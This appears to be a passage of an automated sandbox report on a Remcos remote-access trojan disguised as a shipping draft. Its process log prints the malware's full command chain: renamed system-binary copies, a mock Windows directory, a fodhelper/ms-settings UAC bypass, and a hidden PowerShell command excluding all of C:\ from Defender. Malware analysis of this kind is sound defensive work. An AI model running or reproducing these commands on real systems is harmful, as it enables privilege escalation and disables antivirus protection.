Source: C:\Users\Public\alpha.exe Code function: String function: 00007FF70CC83448 appears 108 times
Source: C:\Users\Public\alpha.exe Code function: String function: 00007FF70CC8498C appears 60 times
Source: C:\Users\Public\alpha.exe Code function: String function: 00007FF70CC8081C appears 54 times
Source: C:\Users\Public\ger.exe Code function: String function: 00007FF7E0A3D3D0 appears 56 times
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4094108405.00000000022F6000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1816800517.000000003FAF2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemspass.exe8 vs 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1868132171.000000003FC60000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemspass.exe8 vs 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1806981780.0000000027571000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemspass.exe8 vs 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTruesight4 vs 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTruesight4 vs 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1807026604.000000003FADD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemspass.exe8 vs 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1791549862.000000002754C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1809280933.000000003FAF2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemspass.exe8 vs 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1825035104.00000000274FA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemspass.exe8 vs 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1868972825.000000003FC6E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemspass.exe8 vs 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4110547668.00000000264F0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1868972825.000000003FC5F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemspass.exe8 vs 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Binary or memory string: OriginalFileName vs 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000026.00000002.1834443495.000000000041B000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenamemspass.exe8 vs 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: 39.2.Glzskrlg.PIF.26e20000.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 39.2.Glzskrlg.PIF.26e20000.3.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 39.2.Glzskrlg.PIF.26e20000.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 39.2.Glzskrlg.PIF.26e20000.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 39.2.Glzskrlg.PIF.26e20000.3.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 39.2.Glzskrlg.PIF.26e20000.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000027.00000002.1894385900.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000027.00000002.1879306334.0000000026E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000027.00000002.1879306334.0000000026E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000027.00000002.1879306334.0000000026E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000000.00000002.4114575191.00000000279AB000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe PID: 7252, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: Glzskrlg.PIF PID: 7780, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: classification engine Classification label: mal100.rans.phis.troj.spyw.expl.evad.winEXE@67/28@3/4
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF70CC732B0 _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,wcschr,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,GetLastError,GetLastError, 5_2_00007FF70CC732B0
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_27957952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, 0_2_27957952
Source: C:\Users\Public\ger.exe Code function: 16_2_00007FF7E0A33F5C GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle, 16_2_00007FF7E0A33F5C
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF70CC9FB54 memset,GetDiskFreeSpaceExW,??_V@YAXPEAX@Z, 5_2_00007FF70CC9FB54
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_2794F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle, 0_2_2794F474
Source: C:\Windows \System32\per.exe Code function: 17_2_00007FF6FEF92850 CoInitializeEx,CoCreateInstance,WindowsGetStringRawBuffer, 17_2_00007FF6FEF92850
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_2795B4A8 FindResourceA,LoadResource,LockResource,SizeofResource, 0_2_2795B4A8
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_2795AC78 OpenSCManagerW,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW, 0_2_2795AC78
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe File created: C:\Users\Public\Libraries\PNO
Source: C:\Users\Public\xkn.exe Mutant created: NULL
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Mutant created: \Sessions\1\BaseNamedObjects\CorelDraw-OW5ET7
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7396:120:WilError_03
Source: C:\Users\Public\Libraries\glrkszlG.pif File created: C:\Users\user\AppData\Local\Temp\18A2.tmp
Source: C:\Users\Public\Libraries\glrkszlG.pif Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\18A2.tmp\18A3.tmp\18A4.bat C:\Users\Public\Libraries\glrkszlG.pif"
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Glzskrlg.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe System information queried: HandleInformation
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "SystemSettings.exe")
Source: C:\Users\Public\Libraries\glrkszlG.pif File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000024.00000002.1865964379.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000025.00000002.1832307600.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000024.00000002.1865964379.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000024.00000002.1865964379.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000024.00000002.1865964379.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000024.00000002.1865964379.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000024.00000003.1864218322.000000000092B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000024.00000002.1865964379.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe ReversingLabs: Detection: 28%
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Virustotal: Detection: 27%
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe File read: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Evasive API call chain: __getmainargs,DecisionNodes,exit
Source: unknown Process created: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe "C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe"
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Process created: C:\Users\Public\Libraries\glrkszlG.pif C:\Users\Public\Libraries\glrkszlG.pif
Source: C:\Users\Public\Libraries\glrkszlG.pif Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\18A2.tmp\18A3.tmp\18A4.bat C:\Users\Public\Libraries\glrkszlG.pif"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
Source: C:\Users\Public\alpha.exe Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
Source: C:\Users\Public\xkn.exe Process created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
Source: C:\Users\Public\alpha.exe Process created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows \System32\per.exe "C:\\Windows \\System32\\per.exe"
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Process created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe C:\\Users\\Public\\Libraries\\Glzskrlg.PIF
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM SystemSettings.exe
Source: unknown Process created: C:\Windows\System32\SystemSettingsAdminFlows.exe "C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 2
Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\\Windows \\System32\\per.exe" / A / F / Q / S
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
